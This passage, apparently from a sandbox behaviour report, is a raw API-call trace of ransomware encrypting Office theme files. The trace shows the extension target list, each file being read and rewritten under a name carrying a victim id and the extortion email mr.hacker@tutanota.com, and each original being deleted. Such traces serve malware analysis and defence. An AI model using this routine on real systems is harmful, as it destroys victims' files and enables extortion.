lpString2="eftx") returned -1 [0269.897] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.897] lstrlenW (lpString="Composite.eftx") returned 14 [0269.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.898] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=533988) returned 1 [0269.898] CloseHandle (hObject=0x3ac) returned 1 [0269.898] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx")) returned 0x20 [0269.898] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.899] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.899] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.899] GetLastError () returned 0x0 [0269.899] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x825e4, lpOverlapped=0x0) returned 1 [0269.912] WriteFile (in: hFile=0x3b0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x825f0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x825f0, lpOverlapped=0x0) returned 1 [0270.124] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.124] WriteFile (in: hFile=0x3b0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0270.124] SetEndOfFile (hFile=0x3b0) returned 1 [0270.124] CloseHandle (hObject=0x3b0) returned 1 [0270.125] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.125] SetEndOfFile (hFile=0x3ac) returned 1 [0270.138] CloseHandle (hObject=0x3ac) returned 1 [0270.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.152] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx")) returned 1 [0270.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.183] lstrlenW (lpString=".doc") returned 4 [0270.183] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.183] lstrlenW (lpString=".docx") returned 5 [0270.183] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.183] lstrlenW (lpString=".pdf") returned 4 [0270.183] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.183] lstrlenW (lpString=".xls") returned 4 [0270.183] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.183] lstrlenW (lpString=".xlsx") returned 5 [0270.184] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.184] lstrlenW (lpString=".ppt") returned 4 [0270.184] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.184] lstrlenW (lpString=".zip") returned 4 [0270.184] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.184] lstrlenW (lpString=".rar") returned 4 [0270.184] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.184] lstrlenW (lpString=".bz2") returned 4 [0270.184] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.184] lstrlenW (lpString=".7z") returned 3 [0270.184] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.184] lstrlenW (lpString=".dbf") returned 4 [0270.184] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.184] lstrlenW (lpString=".1cd") returned 4 [0270.184] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.185] lstrlenW (lpString=".jpg") returned 4 [0270.185] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.185] lstrlenW (lpString=".doc") returned 4 [0270.185] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.185] lstrlenW (lpString=".docx") returned 5 [0270.185] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.185] lstrlenW (lpString=".pdf") returned 4 [0270.185] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.185] lstrlenW (lpString=".xls") returned 4 [0270.185] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.185] lstrlenW (lpString=".xlsx") returned 5 [0270.185] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.185] lstrlenW (lpString=".ppt") returned 4 [0270.185] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.185] lstrlenW (lpString=".zip") returned 4 [0270.185] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.185] lstrlenW (lpString=".rar") returned 4 [0270.185] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.185] lstrlenW (lpString=".bz2") returned 4 [0270.185] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.185] lstrlenW (lpString=".7z") returned 3 [0270.186] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.186] lstrlenW (lpString=".dbf") returned 4 [0270.186] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.186] lstrlenW (lpString=".1cd") returned 4 [0270.186] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0270.186] lstrlenW (lpString=".jpg") returned 4 [0270.186] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.186] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.186] lstrlenW (lpString="Elemental.eftx") returned 14 [0270.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.250] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=314017) returned 1 [0270.250] CloseHandle (hObject=0x394) returned 1 [0270.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx")) returned 0x20 [0270.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.250] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.250] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.251] GetLastError () returned 0x0 [0270.251] ReadFile (in: hFile=0x394, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x4caa1, lpOverlapped=0x0) returned 1 [0270.266] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x4cab0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x4cab0, lpOverlapped=0x0) returned 1 [0270.392] ReadFile (in: hFile=0x394, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.392] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0270.392] SetEndOfFile (hFile=0x384) returned 1 [0270.392] CloseHandle (hObject=0x384) returned 1 [0270.392] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.392] SetEndOfFile (hFile=0x394) returned 1 [0270.400] CloseHandle (hObject=0x394) returned 1 [0270.400] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx")) returned 1 [0270.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.835] lstrlenW (lpString=".doc") returned 4 [0270.835] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.835] lstrlenW (lpString=".docx") returned 5 [0270.836] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.836] lstrlenW (lpString=".pdf") returned 4 [0270.836] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.836] lstrlenW (lpString=".xls") returned 4 [0270.836] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.836] lstrlenW (lpString=".xlsx") returned 5 [0270.836] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.836] lstrlenW (lpString=".ppt") returned 4 [0270.836] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.836] lstrlenW (lpString=".zip") returned 4 [0270.836] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.836] lstrlenW (lpString=".rar") returned 4 [0270.836] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.836] lstrlenW (lpString=".bz2") returned 4 [0270.836] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.836] lstrlenW (lpString=".7z") returned 3 [0270.836] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.836] lstrlenW (lpString=".dbf") returned 4 [0270.836] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.836] lstrlenW (lpString=".1cd") returned 4 [0270.836] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.836] lstrlenW (lpString=".jpg") returned 4 [0270.836] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.837] lstrlenW (lpString=".doc") returned 4 [0270.837] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString=".docx") returned 5 [0270.837] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.837] lstrlenW (lpString=".pdf") returned 4 [0270.837] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString=".xls") returned 4 [0270.837] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString=".xlsx") returned 5 [0270.837] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.837] lstrlenW (lpString=".ppt") returned 4 [0270.837] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.837] lstrlenW (lpString=".zip") returned 4 [0270.837] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString=".rar") returned 4 [0270.837] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString=".bz2") returned 4 [0270.837] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString=".7z") returned 3 [0270.837] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.837] lstrlenW (lpString=".dbf") returned 4 [0270.837] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.837] lstrlenW (lpString=".1cd") returned 4 [0270.837] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0270.838] lstrlenW (lpString=".jpg") returned 4 [0270.838] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.838] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.838] lstrlenW (lpString="Median.eftx") returned 11 [0270.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.864] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=39546) returned 1 [0270.864] CloseHandle (hObject=0x3b0) returned 1 [0270.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx")) returned 0x20 [0270.867] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.867] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.867] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.867] GetLastError () returned 0x0 [0270.867] ReadFile (in: hFile=0x3b0, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x9a7a, lpOverlapped=0x0) returned 1 [0270.869] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x9a80, lpOverlapped=0x0) returned 1 [0270.871] ReadFile (in: hFile=0x3b0, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.871] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0270.871] SetEndOfFile (hFile=0x388) returned 1 [0270.871] CloseHandle (hObject=0x388) returned 1 [0270.871] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.871] SetEndOfFile (hFile=0x3b0) returned 1 [0270.875] CloseHandle (hObject=0x3b0) returned 1 [0270.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx")) returned 1 [0270.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.876] lstrlenW (lpString=".doc") returned 4 [0270.876] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.876] lstrlenW (lpString=".docx") returned 5 [0270.876] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.876] lstrlenW (lpString=".pdf") returned 4 [0270.876] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.876] lstrlenW (lpString=".xls") returned 4 [0270.876] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.876] lstrlenW (lpString=".xlsx") returned 5 [0270.876] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.876] lstrlenW (lpString=".ppt") returned 4 [0270.876] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.876] lstrlenW (lpString=".zip") returned 4 [0270.876] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.876] lstrlenW (lpString=".rar") returned 4 [0270.876] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.876] lstrlenW (lpString=".bz2") returned 4 [0270.876] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.877] lstrlenW (lpString=".7z") returned 3 [0270.877] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.877] lstrlenW (lpString=".dbf") returned 4 [0270.877] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.877] lstrlenW (lpString=".1cd") returned 4 [0270.877] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.877] lstrlenW (lpString=".jpg") returned 4 [0270.877] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.877] lstrlenW (lpString=".doc") returned 4 [0270.877] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.877] lstrlenW (lpString=".docx") returned 5 [0270.877] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.877] lstrlenW (lpString=".pdf") returned 4 [0270.877] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.877] lstrlenW (lpString=".xls") returned 4 [0270.877] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.877] lstrlenW (lpString=".xlsx") returned 5 [0270.877] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.877] lstrlenW (lpString=".ppt") returned 4 [0270.877] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.877] lstrlenW (lpString=".zip") returned 4 [0270.877] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.878] lstrlenW (lpString=".rar") returned 4 [0270.878] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.878] lstrlenW (lpString=".bz2") returned 4 [0270.878] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.878] lstrlenW (lpString=".7z") returned 3 [0270.878] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.878] lstrlenW (lpString=".dbf") returned 4 [0270.878] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.878] lstrlenW (lpString=".1cd") returned 4 [0270.878] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0270.878] lstrlenW (lpString=".jpg") returned 4 [0270.878] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.878] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.878] lstrlenW (lpString="Metro.eftx") returned 10 [0270.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.881] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=24117) returned 1 [0270.881] CloseHandle (hObject=0x384) returned 1 [0270.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx")) returned 0x20 [0270.881] GetFileAttributesW (lpFileName="C:\\Program 